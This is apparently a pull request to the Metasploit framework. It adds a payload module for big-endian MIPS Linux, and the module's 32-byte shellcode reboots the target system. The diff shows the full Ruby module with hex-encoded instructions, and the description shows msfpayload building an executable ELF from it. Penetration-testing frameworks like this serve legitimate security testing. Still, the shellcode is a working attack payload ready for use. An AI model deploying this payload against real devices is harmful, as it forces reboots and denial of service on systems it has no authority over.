### PR TITLE
reboot payload for mipsbe

### DIFF
--- a/modules/payloads/singles/linux/mipsbe/reboot.rb
+++ b/modules/payloads/singles/linux/mipsbe/reboot.rb
@@ -12,7 +12,7 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Linux Reboot Payload',
+      'Name'          => 'Linux Reboot',
       'Description'   => %q{
                 A very small shellcode for rebooting the system.
                 This module is sometimes helpful for testing purposes.

--- a/modules/payloads/singles/linux/mipsbe/reboot.rb
+++ b/modules/payloads/singles/linux/mipsbe/reboot.rb
@@ -1,0 +1,52 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Linux Reboot Payload',
+      'Description'   => %q{
+                A very small shellcode for rebooting the system.
+                This module is sometimes helpful for testing purposes.
+         },
+      'Author'        =>
+        [
+          'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
+          'rigan - <imrigan@gmail.com>'  #original payload
+        ],
+      'References'    => ['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'linux',
+      'Arch'          => ARCH_MIPSBE,
+      'Payload'       =>
+        {
+          'Offsets' => {} ,
+          'Payload' => ''
+        })
+    )
+  end
+
+  def generate
+
+    shellcode =
+        "\x3c\x06\x43\x21" +  #lui     a2,0x4321
+        "\x34\xc6\xfe\xdc" +  #ori     a2,a2,0xfedc
+        "\x3c\x05\x28\x12" +  #lui     a1,0x2812
+        "\x34\xa5\x19\x69" +  #ori     a1,a1,0x1969
+        "\x3c\x04\xfe\xe1" +  #lui     a0,0xfee1
+        "\x34\x84\xde\xad" +  #ori     a0,a0,0xdead
+        "\x24\x02\x0f\xf8" +  #li      v0,4088
+        "\x01\x01\x01\x0c"    #syscall 0x40404
+
+    return super + shellcode
+  end
+
+end


### PR DESCRIPTION
This is the big endian version of the MIPS reboot payload (https://github.com/rapid7/metasploit-framework/pull/3041)

Original source of this payload: http://www.shell-storm.org/shellcode/files/shellcode-795.php

[1.9.3-p125@msf](mipsbe_reboot_payload) root@msf-fu:~/msf-git/metasploit-framework#
# ./msfpayload linux/mipsbe/reboot X > /firmware_stuff/learning_mips/mipsbe_reboot.elf

Created by msfpayload (http://www.metasploit.com).
Payload: linux/mipsbe/reboot
 Length: 32
Options: {}
[1.9.3-p125@msf](mipsbe_reboot_payload) root@msf-fu:~/msf-git/metasploit-framework#
# file /firmware_stuff/learning_mips/mipsbe_reboot.elf

/firmware_stuff/learning_mips/mipsbe_reboot.elf: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, corrupted section header size
